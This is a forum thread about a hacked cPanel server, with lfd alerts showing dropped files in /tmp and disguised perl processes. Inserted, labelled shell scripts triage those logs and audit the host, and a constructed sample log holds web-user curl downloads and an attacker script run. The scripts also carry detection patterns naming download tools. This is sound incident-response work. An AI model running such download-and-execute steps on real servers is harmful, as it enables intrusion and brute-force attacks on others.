Mar 30 11:09:31 server lfd[29581]: *Suspicious Process* PID:21807 PPID:21800 User:bppromo Uptime:88 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br/dns_cache.db -R 250 -p -n img.boaspromocoes.com.br -o /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br /usr/local/apache/domlogs/img.boaspromocoes.com.br.bkup
Mar 30 11:09:31 server lfd[29581]: *Suspicious Process* PID:21808 PPID:21800 User:bppromo Uptime:88 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br/dns_cache.db -R 250 -p -n img.boaspromocoes.com.br -o /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br /usr/local/apache/domlogs/img.boaspromocoes.com.br.bkup
Mar 30 11:09:32 server lfd[29581]: *Suspicious Process* PID:21810 PPID:21800 User:bppromo Uptime:88 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br/dns_cache.db -R 250 -p -n img.boaspromocoes.com.br -o /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br /usr/local/apache/domlogs/img.boaspromocoes.com.br.bkup
Mar 30 11:12:31 server lfd[12764]: *Suspicious Process* PID:5618 PPID:29903 User:cavvesc Uptime:83 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:12:31 server lfd[12764]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:15499 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 11:18:06 server lfd[8922]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 11:20:31 server lfd[21881]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1140202 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 11:23:08 server lfd[5072]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 11:23:08 server lfd[5072]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 11:23:08 server lfd[5072]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 11:24:33 server lfd[13657]: *Suspicious Process* PID:12404 PPID:12067 User:cavvesc Uptime:349 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:27:34 server lfd[31574]: *Suspicious Process* PID:13966 PPID:12067 User:cavvesc Uptime:178 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:28:10 server lfd[2943]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 11:28:35 server lfd[5573]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:472285 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 11:30:36 server lfd[17552]: *Suspicious Process* PID:934 PPID:31838 User:cavvesc Uptime:165 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:32:37 server lfd[29500]: *Suspicious Process* PID:888 PPID:31838 User:bppromo Uptime:287 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:47:42 server lfd[16994]: *Suspicious Process* PID:6191 PPID:31838 User:cavvesc Uptime:1139 secs EXE:/usr/bin/php CMD:/usr/bin/php

Notice that he downloaded IP lists and executed that wn.php.

The wn.php file is no longer there; from what I noticed he deleted it and must reuse it later.

How do I find the hole this guy is using to get into the server?
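
Added example, not part of the thread: a small shell triage of lfd lines in the format shown above that flags what deserves a first look: a binary executing out of /tmp, an interpreter whose argv[0] disagrees with the executable on disk (perl shown as httpd or [bash]), download tools and scripts run by the web server user, and files that user dropped into /tmp. A constructed sample is embedded; the path /var/log/lfd.log for the real file on a CSF host is an assumption.

```shell
#!/bin/sh
# Triage of ConfigServer lfd "*Suspicious Process*" / "*Suspicious File*" lines.
# Added example, not part of the thread; feed it the log on stdin, e.g.
#   sh lfd_triage.sh < /var/log/lfd.log      (path assumed for a CSF host)

# Constructed sample in the same format as the thread's log; the IP and URL are
# placeholders, the process/file patterns mirror what the thread shows.
LFD_SAMPLE='Mar 29 03:43:13 server lfd[20980]: *Suspicious Process* PID:22300 PPID:16728 User:nobody Uptime:107 secs EXE:/usr/local/bin/php CMD:php wn.php 203.0.113.5
Mar 29 04:00:12 server lfd[29566]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:358981 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 04:01:10 server lfd[14656]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1027440 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 04:05:11 server lfd[19777]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 04:05:12 server lfd[19777]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 04:05:14 server lfd[19778]: *Suspicious Process* PID:23726 PPID:3660 User:nobody Uptime:98 secs EXE:/usr/bin/curl CMD:curl -O http://example.invalid/list.txt
Mar 29 22:25:17 server lfd[19979]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:254 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 10:59:28 server lfd[9971]: *Suspicious Process* PID:3403 PPID:3149 User:cavvesc Uptime:71 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10
Mar 30 10:53:27 server lfd[6628]: *Suspicious Process* PID:27122 PPID:8957 User:cavvesc Uptime:601 secs EXE:/usr/bin/php CMD:/usr/bin/php'

# Print one "REASON<TAB>detail" line per event that deserves a first look.
# The heuristics prioritise reading, they are not proof: argv[0] can differ
# from the executable legitimately (shell symlinks, daemons that rename).
lfd_triage() {
  awk '
    function base(p) { sub(/.*\//, "", p); return p }
    function field(re, skip) {             # text after a "Key:" prefix, or ""
      if (match($0, re)) return substr($0, RSTART + skip, RLENGTH - skip)
      return ""
    }
    /\*Suspicious Process\*/ {
      exe  = field("EXE:[^ ]+", 4)
      cmd  = field("CMD:.*", 4)
      user = field("User:[^ ]+", 5)
      n = split(cmd, a, " ")
      # 1. anything executing out of a world-writable scratch directory
      if (exe ~ /^\/(tmp|var\/tmp|dev\/shm)\//) {
        print "EXE_IN_TMP\t" user " " exe " shown as " cmd; next
      }
      # 2. executable and argv[0] disagree: perl posing as httpd or [bash]
      if (n > 0 && base(exe) != base(a[1])) {
        print "ARGV0_MISMATCH\t" user " " exe " shown as " a[1]; next
      }
      # 3. download tool run by the web server user
      if (user == "nobody" && base(exe) ~ /^(curl|wget|fetch|lynx)$/) {
        print "DOWNLOAD\t" user " " cmd; next
      }
      # 4. interpreter run by the web server user with a script argument
      if (user == "nobody" && n > 1 && base(exe) ~ /^(php|perl|python)$/) {
        print "WEBUSER_SCRIPT\t" user " " cmd; next
      }
      next
    }
    /\*Suspicious File\*/ {
      path  = field("\\*Suspicious File\\* [^ ]+", 18)
      owner = field(" \\[[^:]+:", 2); sub(/:$/, "", owner)
      # 5. file the web server user dropped into a scratch directory
      if (owner == "nobody" && path ~ /^\/(tmp|var\/tmp|dev\/shm)\//) {
        print "TMP_FILE\t" owner " " path
      }
    }'
}

# Event counts per reason, e.g. "2 ARGV0_MISMATCH".
lfd_summary() { lfd_triage | cut -f1 | sort | uniq -c | sed 's/^ *//'; }

printf '%s\n' "$LFD_SAMPLE" | lfd_triage
printf '%s\n' "$LFD_SAMPLE" | lfd_summary
```

The long-lived perl processes that lfd reports as httpd and [bash] are the first thing the ARGV0_MISMATCH line points at; the WEBUSER_SCRIPT and DOWNLOAD lines show the chain started under the web server user, which narrows the entry point to what that user runs.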


  


2. Re: Server being hacked and I can't figure out how

Daniel Lara Souza
danniel-lara

(uses Fedora)

Sent on 30/03/2015 - 15:14h


Check the running processes, check those directories inside /tmp,
check the users, check the crontab, etc.


3. Re: Server being hacked and I can't figure out how

Patrick
patricknn

(uses Other)

Sent on 30/03/2015 - 15:21h


I checked all the running processes and there was nothing unusual, just things that were executed by those files.

I deleted all the files inside TMP, but I had already deleted them once before and they came back.

The crontab looks like this:

0 6 * * * /usr/local/cpanel/scripts/exim_tidydb > /dev/null 2>&1
30 5 * * * /usr/local/cpanel/scripts/optimize_eximstats > /dev/null 2>&1
2,58 * * * * /usr/local/bandmin/bandmin
0 0 * * * /usr/local/bandmin/ipaddrmap
0 4 * * * /usr/local/cpanel/scripts/upcp --cron
0 1 * * * /usr/local/cpanel/scripts/cpbackup
0 2 * * * /usr/local/cpanel/bin/backup
35 * * * * /usr/bin/test -x /usr/local/cpanel/bin/tail-check && /usr/local/cpanel/bin/tail-check
45 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_mailman_cache && /usr/local/cpanel/scripts/update_mailman_cache
30 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_db_cache && /usr/local/cpanel/scripts/update_db_cache
45 */8 * * * /usr/bin/test -x /usr/local/cpanel/bin/optimizefs && /usr/local/cpanel/bin/optimizefs
30 */2 * * * /usr/local/cpanel/bin/mysqluserstore >/dev/null 2>&1
15 */2 * * * /usr/local/cpanel/bin/dbindex >/dev/null 2>&1
15 */6 * * * /usr/local/cpanel/scripts/autorepair recoverymgmt >/dev/null 2>&1
*/5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1
37 4 * * * /usr/local/cpanel/whostmgr/docroot/cgi/cpaddons_report.pl --notify
10,25,40,55 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1

I didn't see anything unusual there.

As for the users, I checked all of them; none logged in via SSH except mine, and mine was not logged in from any strange IP, and the password is not something common and would take years to crack. Since I have a firewall, the IP is blocked after every 3 attempts.

I noticed that the files only appear inside TMP.
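
Added example, not Daniel's or the thread's own commands: a shell version of the checks he lists, meant to be run as root on the cPanel host. It walks /proc for processes whose binary lives in a scratch directory or was deleted after it started, reads every crontab rather than only root's (per-user crontabs under /var/spool/cron/<user> on CentOS 6 is an assumption about this host), and lists hidden entries in /tmp with owner and time; the classify_* helpers take plain strings so they can be tried without root.

```shell
#!/bin/sh
# Live-host checks for what the thread asks to inspect: processes, /tmp, users'
# cron entries. Added example (not the thread's commands); run as root on the
# CentOS 6 / cPanel host with:  sh triage.sh run
# The classify_* helpers are pure string functions so they can be tested alone.

SCRATCH='/tmp /var/tmp /dev/shm'   # world-writable dirs where the droppers lived

# Classify the target of `readlink /proc/PID/exe`:
#   scratch - binary lives in a world-writable directory (EXE:/tmp/.nynew5/b)
#   deleted - binary was unlinked after it started ("copies, runs, deletes")
#   ok      - neither; argv[0] may still lie, compare it with the exe yourself
classify_exe() {
  case "$1" in
    *' (deleted)')                echo deleted ;;
    /tmp/*|/var/tmp/*|/dev/shm/*) echo scratch ;;
    *)                            echo ok ;;
  esac
}

# Classify one crontab line by its command part: skip (blank/comment),
# scratch, hidden (a dot-directory such as /home/u/.cache/x), download, ok.
classify_cron_line() {
  case "$1" in
    ''|'#'*) echo skip; return ;;
    @*)      cmd=${1#* } ;;                   # @reboot CMD, @daily CMD
    *)       cmd=$(printf '%s\n' "$1" | awk '{ $1=$2=$3=$4=$5=""; print substr($0, 6) }') ;;
  esac
  case " $cmd" in
    *' /tmp/'*|*' /var/tmp/'*|*' /dev/shm/'*) echo scratch ;;
    */.*)                                     echo hidden ;;
    *curl*|*wget*)                            echo download ;;
    *)                                        echo ok ;;
  esac
}

# Processes whose binary is in a scratch dir or already deleted, with the
# parent PID so the spawning Apache worker (the lfd PPIDs) can be traced.
find_suspect_processes() {
  for p in /proc/[0-9]*; do
    exe=$(readlink "$p/exe" 2>/dev/null) || continue   # kernel threads: no exe
    kind=$(classify_exe "$exe")
    [ "$kind" = ok ] && continue
    uid=$(awk '/^Uid:/ { print $2 }' "$p/status")
    ppid=$(awk '/^PPid:/ { print $2 }' "$p/status")
    argv0=$(tr '\0' ' ' < "$p/cmdline" | cut -d' ' -f1)
    printf 'pid=%s ppid=%s uid=%s %s exe=%s argv0=%s\n' \
      "${p#/proc/}" "$ppid" "$uid" "$kind" "$exe" "$argv0"
  done
}

# Every crontab, not only root's: on CentOS 6 each user's lives in
# /var/spool/cron/<user>, system jobs in /etc/crontab and /etc/cron.d
# (those two carry a user column, which the pattern match tolerates).
find_suspect_cron() {
  for f in /etc/crontab /etc/cron.d/* /var/spool/cron/*; do
    [ -f "$f" ] || continue
    while IFS= read -r line; do
      kind=$(classify_cron_line "$line")
      case "$kind" in
        ok|skip) ;;
        *) printf '%s: %s: %s\n' "$f" "$kind" "$line" ;;
      esac
    done < "$f"
  done
}

# Hidden entries in the scratch dirs (lfd flagged /tmp/.ppma and /tmp/.nynew5)
# with owner and mtime; .ICE-unix/.X11-unix are normal. GNU find assumed.
find_hidden_scratch() {
  for d in $SCRATCH; do
    [ -d "$d" ] || continue
    find "$d" -mindepth 1 -maxdepth 1 -name '.*' \
      ! -name '.ICE-unix' ! -name '.X11-unix' \
      -printf '%u %TY-%Tm-%Td %TH:%TM %p\n'
  done
}

if [ "${1:-}" = run ]; then
  echo '== processes from scratch dirs or deleted binaries'; find_suspect_processes
  echo '== cron entries worth a look';                      find_suspect_cron
  echo '== hidden entries in scratch dirs';                 find_hidden_scratch
fi
```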


4. Re: Server being hacked and I can't figure out how

Daniel Lara Souza
danniel-lara

(uses Fedora)

Sent on 30/03/2015 - 15:38h


OK, now check those files inside /tmp.




5. Re: Server being hacked and I can't figure out how

Patrick
patricknn

(uses Other)

Sent on 30/03/2015 - 15:42h


I checked; they were scripts that downloaded a list of IPs and started brute-forcing them with a list of usernames and passwords.
I already deleted them.



6. Re: Server being hacked and I can't figure out how

Daniel Lara Souza
danniel-lara

(uses Fedora)

Sent on 30/03/2015 - 15:43h


Cool; now you have to do preventive work on that server so it doesn't happen again.


7. Re: Server being hacked and I can't figure out how

Andre Ribeiro da Costa
andr3ribeiro

(uses Arch Linux)

Sent on 30/03/2015 - 15:50h

He had already checked users, cron, the tmp folder, etc... prevention is exactly the help he asked for when he opened the topic.


8. Re: Server being hacked and I can't figure out how

Patrick
patricknn

(uses Other)

Sent on 30/03/2015 - 15:51h


The problem is that the last time I deleted the files they showed up again, meaning the guy was still managing to get in.
As for prevention, I changed a lot of things that ConfigServer & Firewall asked for, so let's see.

I also tried running some software that looks for malware, but it didn't find anything.
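
Added example, neither CSF's own check nor the thread's: an audit of two settings that bear directly on this log, where a binary ran out of /tmp as nobody and PHP spawned curl and wget. It verifies that the scratch mounts carry noexec and nosuid and that the two PHP binaries the log shows (/usr/bin/php and /usr/local/bin/php) list the process-spawning functions in disable_functions; the parse helpers take strings so they can be tried offline, and which php.ini Apache's PHP actually reads is an assumption to confirm on the host.

```shell
#!/bin/sh
# Audit of two controls relevant to this log: nothing executes out of /tmp,
# and PHP under the web server cannot spawn curl/wget/perl. Added example,
# not CSF's check. Run as root with:  sh audit.sh run

# Return 0 if a /proc/mounts line carries both noexec and nosuid.
#   "tmpfs /tmp tmpfs rw,noexec,nosuid,nodev 0 0"  -> hardened
#   "/dev/sda1 /tmp ext4 rw,relatime 0 0"          -> not
mount_is_hardened() {
  opts=$(printf '%s\n' "$1" | awk '{ print $4 }')
  case ",$opts," in
    *,noexec,*) ;;
    *) return 1 ;;
  esac
  case ",$opts," in
    *,nosuid,*) return 0 ;;
    *) return 1 ;;
  esac
}

# Print the process-spawning PHP functions that are NOT in a disable_functions
# value (comma-separated, spaces allowed); prints nothing when all are covered.
php_spawn_functions_enabled() {
  wanted='exec system passthru shell_exec popen proc_open pcntl_exec'
  have=$(printf '%s' "$1" | tr -d ' ' | tr ',' '\n')
  for f in $wanted; do
    printf '%s\n' "$have" | grep -qx "$f" || printf '%s\n' "$f"
  done
}

# Live checks: scratch mounts, then each PHP binary the log showed in use.
# noexec stops /tmp/.nynew5/b from running directly but not "perl /tmp/r",
# so it is a speed bump; disable_functions binds only PHP loaded as a module
# (the log's user "nobody" points at mod_php), not a CGI/suPHP setup.
audit_host() {
  for d in /tmp /var/tmp /dev/shm; do
    line=$(awk -v d="$d" '$2 == d' /proc/mounts | tail -n 1)
    if [ -z "$line" ]; then
      echo "$d: not a separate mount, so noexec cannot be set for it alone"
    elif mount_is_hardened "$line"; then
      echo "$d: noexec,nosuid present"
    else
      echo "$d: MISSING noexec/nosuid -> $line"
    fi
  done
  for php in /usr/bin/php /usr/local/bin/php; do
    [ -x "$php" ] || continue
    df=$("$php" -r 'echo ini_get("disable_functions");' 2>/dev/null)
    missing=$(php_spawn_functions_enabled "$df" | tr '\n' ' ')
    if [ -n "$missing" ]; then
      echo "$php: still allows: $missing"
    else
      echo "$php: spawn functions disabled"
    fi
  done
}

if [ "${1:-}" = run ]; then
  audit_host
fi
```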



9. Re: Server being hacked and I can't figure out how

Fernando A. Vita
fernandoavita

(uses Debian)

Sent on 31/03/2015 - 01:32h


Not that I have much knowledge to speak on the subject, but in a situation like this it would even be worth the effort to try some vulnerability scans and see whether they provide any help. (It's a good idea to pick the time carefully and go easy so as not to overload the server.)

It's very common for attackers to exploit vulnerabilities using some (badly implemented) feature of some website. From there you can have problems with LFI, RFI and various other things.

Anyway, I can't say much about what I don't know much about :)


10. Re: Server being hacked and I can't figure out how

Patrick
patricknn

(uses Other)

Sent on 31/03/2015 - 09:12h


Could you recommend me a free vulnerability scanner?

Thanks


11. Re: Server being hacked and I can't figure out how

Fabio Tybucheski
binhoty

(uses Debian)

Sent on 31/03/2015 - 09:25h

Hello friend... I would first close all the ports on the firewall even if it brings down the services... After that I would open a few main ones to meet the needs of the server's crucial services... Try to check which access the guy is coming in through... Put a Wireshark on the network and check the connection this guy is using... That way you know where the security failure is, and it becomes easier to narrow down the problem and solve it...


Fabio Tybucheski
Support Analyst
binhoty@gmail.com
